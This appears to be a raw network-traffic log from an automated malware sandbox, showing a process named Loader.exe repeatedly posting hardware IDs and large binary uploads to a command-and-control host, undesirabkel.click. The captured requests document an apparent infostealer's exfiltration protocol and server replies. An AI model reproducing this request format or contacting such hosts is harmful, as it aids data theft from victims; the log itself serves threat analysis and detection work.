                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.449732104.21.30.134437408C:\Users\user\Desktop\Loader.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-27 22:27:03 UTC276OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: multipart/form-data; boundary=M91SY52IFT
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 18122
                                                                                                Host: undesirabkel.click
                                                                                                2024-12-27 22:27:03 UTC15331OUTData Raw: 2d 2d 4d 39 31 53 59 35 32 49 46 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 41 33 45 45 35 44 45 45 46 32 46 34 31 39 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 4d 39 31 53 59 35 32 49 46 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4d 39 31 53 59 35 32 49 46 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 79 78 6f 6a 62 74 75 71 6e 6e 78 66 0d 0a 2d 2d 4d 39 31 53 59 35 32 49 46 54 0d 0a 43
                                                                                                Data Ascii: --M91SY52IFTContent-Disposition: form-data; name="hwid"DCA3EE5DEEF2F4191441EDD8E05CE3DA--M91SY52IFTContent-Disposition: form-data; name="pid"2--M91SY52IFTContent-Disposition: form-data; name="lid"LPnhqo--yxojbtuqnnxf--M91SY52IFTC
                                                                                                2024-12-27 22:27:03 UTC2791OUTData Raw: ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15
                                                                                                Data Ascii: 'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwm
                                                                                                2024-12-27 22:27:06 UTC1130INHTTP/1.1 200 OK
                                                                                                Date: Fri, 27 Dec 2024 22:27:06 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=a6b85h4q0s2eriaq0f62mv8qqb; expires=Tue, 22 Apr 2025 16:13:42 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W53esHzU4U2usNU6XT3wkq6YIn1ajGLaw3Ae2iffABeKRr34VwrHwpaFdqJUC%2BkHdxeCnQ5HUak1AbvskYeZnO0TI92Iu7wsqjmhLgkAh9bgKLn55c97m1ZQiy7bZ3el0dZU%2FOY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8f8cbc5a7e3878d0-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2499&min_rtt=2054&rtt_var=1662&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2846&recv_bytes=19078&delivery_rate=519480&cwnd=144&unsent_bytes=0&cid=70e9878467d7f762&ts=3391&x=0"
                                                                                                2024-12-27 22:27:06 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                2024-12-27 22:27:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.449733104.21.30.134437408C:\Users\user\Desktop\Loader.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-27 22:27:07 UTC284OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: multipart/form-data; boundary=OKFWFD1CV0UIFBA85V7
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 8797
                                                                                                Host: undesirabkel.click
                                                                                                2024-12-27 22:27:07 UTC8797OUTData Raw: 2d 2d 4f 4b 46 57 46 44 31 43 56 30 55 49 46 42 41 38 35 56 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 41 33 45 45 35 44 45 45 46 32 46 34 31 39 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 4f 4b 46 57 46 44 31 43 56 30 55 49 46 42 41 38 35 56 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 4b 46 57 46 44 31 43 56 30 55 49 46 42 41 38 35 56 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 79 78
                                                                                                Data Ascii: --OKFWFD1CV0UIFBA85V7Content-Disposition: form-data; name="hwid"DCA3EE5DEEF2F4191441EDD8E05CE3DA--OKFWFD1CV0UIFBA85V7Content-Disposition: form-data; name="pid"2--OKFWFD1CV0UIFBA85V7Content-Disposition: form-data; name="lid"LPnhqo--yx
                                                                                                2024-12-27 22:27:08 UTC1129INHTTP/1.1 200 OK
                                                                                                Date: Fri, 27 Dec 2024 22:27:08 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=op86ikog16sd0gus1k3ae4ji7n; expires=Tue, 22 Apr 2025 16:13:47 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WuD6dv%2FFnEfSaodkEujTiLAzwx4g5d51wPr2GgmVwxFlU409WZ9MKCs%2BJs6FcZb96u3S%2BjCoYshmXRXj4bQqjCBrsooM9yaEMh0eTisDCuuFy2LoBhZ1QPOZqFq39PCMKq1CVU0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8f8cbc77a9e718d0-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1785&min_rtt=1714&rtt_var=694&sent=8&recv=15&lost=0&retrans=0&sent_bytes=2846&recv_bytes=9739&delivery_rate=1703617&cwnd=191&unsent_bytes=0&cid=fbbd29ca89a17058&ts=811&x=0"
                                                                                                2024-12-27 22:27:08 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                2024-12-27 22:27:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                4192.168.2.449734104.21.30.134437408C:\Users\user\Desktop\Loader.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-27 22:27:10 UTC277OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: multipart/form-data; boundary=XAUBSJLSPWT
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 20402
                                                                                                Host: undesirabkel.click
                                                                                                2024-12-27 22:27:10 UTC15331OUTData Raw: 2d 2d 58 41 55 42 53 4a 4c 53 50 57 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 41 33 45 45 35 44 45 45 46 32 46 34 31 39 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 58 41 55 42 53 4a 4c 53 50 57 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 58 41 55 42 53 4a 4c 53 50 57 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 79 78 6f 6a 62 74 75 71 6e 6e 78 66 0d 0a 2d 2d 58 41 55 42 53 4a 4c 53 50 57
                                                                                                Data Ascii: --XAUBSJLSPWTContent-Disposition: form-data; name="hwid"DCA3EE5DEEF2F4191441EDD8E05CE3DA--XAUBSJLSPWTContent-Disposition: form-data; name="pid"3--XAUBSJLSPWTContent-Disposition: form-data; name="lid"LPnhqo--yxojbtuqnnxf--XAUBSJLSPW
                                                                                                2024-12-27 22:27:10 UTC5071OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                                2024-12-27 22:27:11 UTC1143INHTTP/1.1 200 OK
                                                                                                Date: Fri, 27 Dec 2024 22:27:11 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=2ml8s8mcjapgr3jv59hlgu6h06; expires=Tue, 22 Apr 2025 16:13:49 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hY1l%2FWqPZexehKpnKVR2rHADjFX%2B49pf1h5PcDYlOoEx8%2Bu4un3EslAhHnHTkJ41XnsO%2FN0zxgzJ7NKFVUUEFrpw1IPmd%2BH%2BLtaLhxbB05HoGNt2z6p%2BvjQ4%2BNZvqn2%2BIdGUf5o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8f8cbc85ccf48c6b-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1877&min_rtt=1849&rtt_var=713&sent=15&recv=26&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21359&delivery_rate=1579232&cwnd=145&unsent_bytes=0&cid=4f9820c20a449cdc&ts=986&x=0"
                                                                                                2024-12-27 22:27:11 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                2024-12-27 22:27:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                5192.168.2.449735104.21.30.134437408C:\Users\user\Desktop\Loader.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-27 22:27:13 UTC280OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: multipart/form-data; boundary=XYJVGHQPA055X9Z
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 1236
                                                                                                Host: undesirabkel.click
                                                                                                2024-12-27 22:27:13 UTC1236OUTData Raw: 2d 2d 58 59 4a 56 47 48 51 50 41 30 35 35 58 39 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 41 33 45 45 35 44 45 45 46 32 46 34 31 39 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 58 59 4a 56 47 48 51 50 41 30 35 35 58 39 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 59 4a 56 47 48 51 50 41 30 35 35 58 39 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 79 78 6f 6a 62 74 75 71 6e 6e 78 66 0d 0a
                                                                                                Data Ascii: --XYJVGHQPA055X9ZContent-Disposition: form-data; name="hwid"DCA3EE5DEEF2F4191441EDD8E05CE3DA--XYJVGHQPA055X9ZContent-Disposition: form-data; name="pid"1--XYJVGHQPA055X9ZContent-Disposition: form-data; name="lid"LPnhqo--yxojbtuqnnxf
                                                                                                2024-12-27 22:27:13 UTC1138INHTTP/1.1 200 OK
                                                                                                Date: Fri, 27 Dec 2024 22:27:13 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=jopb6tvchb80f68u62kuttm97c; expires=Tue, 22 Apr 2025 16:13:52 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PnrIHl%2FYAPZ8XoX5VEwLsefgcG9l9lxyS1%2BWpmnIpVacEJTln0OXRO%2Fbw%2BaPbRb6DUcl%2BoxZbtQl6xAP%2F9Hou8jHcuW37uV9L8h5UL3BcFfoe50FIPjIZG5x1XJdFuu%2FMGn%2Bxv0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8f8cbc974bd31a24-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2016&min_rtt=2011&rtt_var=765&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2152&delivery_rate=1420924&cwnd=217&unsent_bytes=0&cid=3df130d1505a5b77&ts=941&x=0"
                                                                                                2024-12-27 22:27:13 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                2024-12-27 22:27:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                6192.168.2.449737104.21.30.134437408C:\Users\user\Desktop\Loader.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-27 22:27:15 UTC280OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: multipart/form-data; boundary=OTJ1QCSBXYCPI
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 569678
                                                                                                Host: undesirabkel.click
                                                                                                2024-12-27 22:27:15 UTC15331OUTData Raw: 2d 2d 4f 54 4a 31 51 43 53 42 58 59 43 50 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 41 33 45 45 35 44 45 45 46 32 46 34 31 39 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 4f 54 4a 31 51 43 53 42 58 59 43 50 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 54 4a 31 51 43 53 42 58 59 43 50 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 79 78 6f 6a 62 74 75 71 6e 6e 78 66 0d 0a 2d 2d 4f 54 4a 31
                                                                                                Data Ascii: --OTJ1QCSBXYCPIContent-Disposition: form-data; name="hwid"DCA3EE5DEEF2F4191441EDD8E05CE3DA--OTJ1QCSBXYCPIContent-Disposition: form-data; name="pid"1--OTJ1QCSBXYCPIContent-Disposition: form-data; name="lid"LPnhqo--yxojbtuqnnxf--OTJ1
                                                                                                2024-12-27 22:27:15 UTC15331OUTData Raw: 7e 57 c5 0a 53 89 95 d2 8c 25 80 a4 27 61 c1 94 c7 61 af 00 db 4c 01 fc 2e bc d6 77 18 87 64 f4 b6 c2 6b 8c a1 f3 92 34 fc 6e b2 8b 08 38 a3 8e 85 71 5c ec 9a 35 3a 54 71 fb ea 7e ae db 76 90 1a e4 f8 ff 56 29 69 3e 40 b7 df 15 dc 41 83 7a 32 b9 27 08 78 6d e1 60 01 9a 82 73 5a 58 78 89 19 bb 27 ad 54 00 e2 fd b9 60 94 7a 8c c1 5b 30 b4 6d b3 84 18 87 a4 7a 85 c1 a5 c4 34 07 37 1c 68 90 e7 05 18 a3 63 b6 67 38 94 40 72 2a 30 75 3b bf 48 93 e6 b7 f9 39 39 ec e1 17 23 a6 68 a7 94 97 23 17 8a 1e 31 8e 7f b5 38 a5 c2 9b d6 8a a3 56 98 ca 6a 0c c1 32 3d 45 88 0d e0 fd 28 2a c6 14 5c c0 b0 28 29 5b 0d fe 2e f2 9c 5a 47 22 97 b4 22 5f c5 3f 66 3c be 6a 27 41 25 33 d2 b1 b0 c4 b2 e6 cc bb 25 e0 b7 87 a6 8d 0e 14 04 3f fa d1 ec cd 23 23 81 2a f1 6b 37 8f e6 a1 a8
                                                                                                Data Ascii: ~WS%'aaL.wdk4n8q\5:Tq~vV)i>@Az2'xm`sZXx'T`z[0mz47hcg8@r*0u;H99#h#18Vj2=E(*\()[.ZG""_?f<j'A%3%?##*k7
                                                                                                2024-12-27 22:27:15 UTC15331OUTData Raw: 08 c9 5b 56 46 d2 d8 c7 91 36 66 4e af a6 33 da 7f ad 41 73 08 cb 1b 05 a5 b0 2f ea ad 72 9b 04 1c b9 a9 30 96 3f 11 d1 42 91 08 f6 92 a0 9d 7a 80 eb 78 81 a0 22 65 86 c1 5e a9 c8 12 d3 b5 cc 47 c3 a6 62 b4 ca f8 f4 b3 ca 75 c9 10 01 e2 9e ee 77 f9 4d 74 93 29 58 28 46 4b f5 21 5e ae f0 85 c6 ec 87 42 91 b1 dd 93 86 c0 07 89 7e 53 a7 14 81 98 a0 92 6b 4a 31 3a e8 9e c1 70 a1 d9 2f 46 d3 83 1d eb f4 12 8b fd 9d e7 99 92 e8 70 41 de be 7a fa 5f aa ae df e3 28 0c 83 32 ce dc 9c 91 df ea 9b 63 96 9c 01 69 84 df f9 8a dc 5c 37 83 08 d7 da 11 aa f5 fd 01 f2 9e ae eb 11 94 2b 67 b8 2e 6f f0 d0 e8 ab f9 a9 ef 62 97 2b ff 0a fa d9 a2 b1 19 ef ed 02 f9 68 c2 99 27 c8 98 3b 98 bb 0f 16 2f c5 64 e5 a9 dd 89 67 93 5a 0f 92 2f 30 1a 16 4e b0 1b 75 f3 24 c2 98 a9 35 65
                                                                                                Data Ascii: [VF6fN3As/r0?Bzx"e^GbuwMt)X(FK!^B~SkJ1:p/FpAz_(2ci\7+g.ob+h';/dgZ/0Nu$5e
                                                                                                2024-12-27 22:27:15 UTC15331OUTData Raw: 1c 44 88 bb 7b 07 a8 be d0 e5 f4 7b cb 90 a2 af 7e 7b 52 62 bb f4 d5 9e 7a 71 e9 d9 d5 30 60 1b 83 9a 63 9b b5 e6 95 00 0c f5 f7 dd 8f 47 5e 31 5d fa 82 33 50 07 5a e6 9b f7 3d 5a 27 5c 0d 57 4a 4d f1 b6 0e 46 f9 ef ae 4d fd 45 d0 4d 11 14 7f 11 3b e0 0b ce d8 fc 57 34 39 7a bd a3 ce 28 67 69 a2 d9 6a 7b a9 e8 a3 13 2f 39 5a 7e 77 49 cd 27 ae d9 ce f9 f0 eb 85 f7 fe 7b 19 b2 c3 82 77 28 6e 1f d0 bd c8 cf 0f 39 d2 0f 08 ff d5 52 52 37 37 39 17 a9 ae a1 4b 76 1f 6f f4 46 2d 89 dc 44 7b dc 73 4d 12 4a 6a d0 13 34 73 01 63 6d 6a 4c a5 6e 6f 41 70 6d 09 76 1e a5 6e 1e 97 a1 13 06 b7 fc ee 9c fc dc 8d 63 f6 b4 1f 2d 49 5b 78 44 d9 db dd fe 71 2e b5 f2 07 c7 20 ce 82 22 7b b5 f9 2e 4f f1 e2 39 9a 5f 59 6b 3f f9 d3 ee 19 9e 7e cb 9f aa 07 dd 5e 7d b0 55 a3 58 94
                                                                                                Data Ascii: D{{~{Rbzq0`cG^1]3PZ=Z'\WJMFMEM;W49z(gij{/9Z~wI'{w(n9RR779KvoF-D{sMJj4scmjLnoApmvnc-I[xDq. "{.O9_Yk?~^}UX
                                                                                                2024-12-27 22:27:15 UTC15331OUTData Raw: 53 7d 7f 2e 0e 6e 1e d4 11 ee f2 d5 3a cd f1 91 32 1a 6f 73 f0 2a 27 e7 2c 78 0d 8d bc 50 5d aa 4d ae 2a 4b 42 c7 1e 50 1d b1 e0 d8 04 ef 77 76 91 17 db bd b3 a7 95 e9 f6 90 db ac 59 99 f7 e4 ef b1 92 0c 78 55 e0 66 75 86 6b 2e c4 5b 46 f4 22 0c e6 b8 e0 0f 33 06 37 f7 22 84 80 d1 44 2e 54 47 04 7a af cf f0 11 07 c7 d5 6c 76 20 cf 43 e9 0d 51 ff 2b 93 b6 c8 a0 80 db 5e 93 4e 45 f7 91 e0 c3 bd cc 26 1e 30 44 71 1c b5 56 75 c1 08 ef bc 7b ff e9 f0 7b 6d 53 7f 2d 49 87 fb 47 24 6d ee a9 bc 57 36 27 a5 fb a1 ff 3e a0 35 2d 9c 4c 58 81 18 fe 89 54 be ff ff 2b b9 21 09 4a c7 78 e0 3c b0 f8 67 e0 92 cc e2 1b 21 46 55 39 25 a5 05 59 0c 7f 5e 2c 79 54 c4 c3 41 38 4f b5 7f e2 ec 08 27 7c 97 28 cb 4a 10 44 fc d9 9e 0e 54 b4 9f 21 89 b5 06 a9 81 5b 51 da d4 43 1f f7
                                                                                                Data Ascii: S}.n:2os*',xP]M*KBPwvYxUfuk.[F"37"D.TGzlv CQ+^NE&0DqVu{{mS-IG$mW6'>5-LXT+!Jx<g!FU9%Y^,yTA8O'|(JDT![QC
                                                                                                2024-12-27 22:27:15 UTC15331OUTData Raw: 10 6e 10 a4 34 b9 f1 bd 9c 38 db 39 b9 b4 36 64 e3 56 31 bf ce 2c 42 ce a9 4e 42 b8 a9 1c 59 61 d1 f8 79 b9 06 5b 2d 5f e8 62 4f 28 90 7b 16 55 48 6a 34 30 f0 15 f8 71 b0 25 90 aa ae dc ea ad 5d 9b 00 c5 7b 6f fb 3c 4b d3 42 06 16 6c bf da 51 2b 62 2d c3 08 40 ec aa 75 46 29 87 eb 73 6c bb 38 a6 f4 0b 61 40 d0 8d b1 7b 7c 3d f7 8f dc dd 9a 74 aa 57 ec 2e 72 f6 68 4b 16 2a 51 89 36 14 b3 1f ef bb fc d1 c8 e6 9b be 67 81 a0 a1 46 53 d8 16 5f d8 e9 36 be e2 7c c3 59 c7 d8 de 8a ed 07 3f 82 0c 7f 08 9d 73 96 fd 55 97 f8 0c fa 5d 82 cd ad 4c c4 10 c0 83 a1 02 7a 6b db a0 bc 2d f7 87 2b 24 9c 8d e8 1d c4 ad df a2 17 1c d5 39 bc a5 8f 3b c4 f1 47 4d 6c 1d a5 17 99 19 90 0c ab 24 19 d1 fb d4 d4 67 f5 e4 31 21 b0 cf 8f ea 90 fe 29 e6 79 90 7f 15 23 47 88 39 7e 9f
                                                                                                Data Ascii: n4896dV1,BNBYay[-_bO({UHj40q%]{o<KBlQ+b-@uF)sl8a@{|=tW.rhK*Q6gFS_6|Y?sU]Lzk-+$9;GMl$g1!)y#G9~
